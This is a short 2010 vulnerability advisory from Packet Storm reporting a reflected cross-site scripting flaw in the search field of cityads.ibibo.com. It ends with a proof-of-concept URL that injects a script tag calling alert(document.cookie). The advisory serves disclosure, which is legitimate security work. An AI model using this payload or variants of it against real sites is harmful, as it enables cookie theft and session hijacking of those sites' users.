Ibibo.com Cross Site Scripting

2010-02-03T00:00:00
ID PACKETSTORM:85883
Type packetstorm
Reporter Rockey Killer
Modified 2010-02-03T00:00:00

Description

                                        
                                            `Cross Site Scripting (XSS)  
Vulnerability in ibibo  
In search fields of cityads.ibibo.com  
  
ibibo.com is India’s first entertainment and talent based social network.  
It gives the youth of India a unique platform to showcase their talent,  
express themselves,  
create their own social network, audience and fan club and hence get  
recognition.  
  
  
Vulnerability  
Non-Persistent Cross site scripting (XSS) vulnerability is found in  
cityads.ibibo.com  
  
Disclosure Timeline  
Reported: Tue, Jan 19, 2010 at 5:23 PM  
Fixed: --------------  
  
Credits  
H4CK3R Crew  
http://h4ck3r.in  
  
POC URL  
  
http://cityads.ibibo.com/search_result.php?cate_id=&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&searchFrom=search_bar  
--   
  
Rockey Killer  
It's all about Hacking and Security  
  
http://h4ck3r.in/  
`